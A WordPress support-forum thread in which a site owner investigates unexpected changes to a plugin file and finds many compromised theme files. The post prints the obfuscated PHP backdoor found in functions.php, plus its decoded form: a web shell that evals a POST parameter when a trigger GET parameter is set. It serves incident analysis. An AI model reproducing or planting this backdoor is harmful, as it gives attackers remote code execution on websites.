Hello,
I synchronize Dropbox with my server, and i’m surprised about an update for acf.php.
I did a diff between the previous (on the left) and the new version (on the right), with lines of code added.
I checked the last version, and i found some more lines at the top.
I restored the previous version for acf.php
Can you tell me more ?
Please find the attached file
Thanks
There should not be any code up there. I did some looking but I found no information. My first reaction is that your site has been hacked. Do you have any other code on your site that should not be there?
Hello John,
I think that right and maybe it’s not a problem about your plugin (thinking because i just found yesterday “acf.php”
When i look for “$_POST[‘dd’]” in the directory, i have many more files modified more than 1 month…
I found these files :
wp-content/themes/yoo_balance_wp/comments.php
wp-content/themes/yoo_balance_wp/sidebar.php
wp-content/themes/yoo_balance_wp/changelog.php
wp-content/themes/yoo_balance_wp/404.php
wp-content/themes/yoo_balance_wp/footer.php
wp-content/themes/yoo_balance_wp/config.php
wp-content/themes/yoo_balance_wp/layouts/attachment.php
wp-content/themes/yoo_balance_wp/layouts/template.config.php
wp-content/themes/yoo_balance_wp/layouts/template.php
wp-content/themes/yoo_balance_wp/layouts/_post.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/module.php
wp-content/themes/yoo_balance_wp/layouts/single.php
wp-content/themes/yoo_balance_wp/header.php
wp-content/themes/yoo_balance_wp/index.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/cache/index.php
About :
/home/www/podologue/wp-content/themes/yoo_balance_wp/functions.php
I found at the beginning
<?php
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
$O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
$OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
$OO0000 = $O00OO0{7} . $O00OO0{13};
$O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51
QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0F
DTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU
1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9Ijtld
mFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>
That’s mean
<?php
$fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
echo apiRequest();
function apiRequest(){
if(@$_GET['op'] == 'check')
{
return "connectjbmoveisok";
exit();
}
}
?>
So i think it’s not the good place, and it’s not your plugin.
Sorry for the time you lost !
I continue to analyse
On this website :
http://gotmls.net/support-topic/wp-site-guardian-warnings/
When i look for “fuckyou4321”, i found :
[code]
Parameter: POST.fuckyou4321
Data: echo (123454320+1);exit();
Impact: 7/91
Potential Vectors: Cross Site Scripting, Cross Site Request Forgery, Remote File Execution, Local File Inclusion
[/code]
If i take my last backup, the 18th december 2017 (i’m going to restore, i don’t know if a backdoor is added), i don’t find the line with $_POST[‘dd’], and my infected version on dropbox is from 18th january 2017 (oldest)
The oldest log for apache in /var/log/apache2, is from the 25th february, so it’s impossible to check the request with GET parameter… 🙁
So it’s a hack of my website
I’m going to install Apache mod to get all informations about requests out / in for GET / POST.
If i’m hack again, i will get all informations and the available page with the bug for the XSS, hoping…
http://httpd.apache.org/docs/2.4/mod/mod_dumpio.html
Capture.png.png
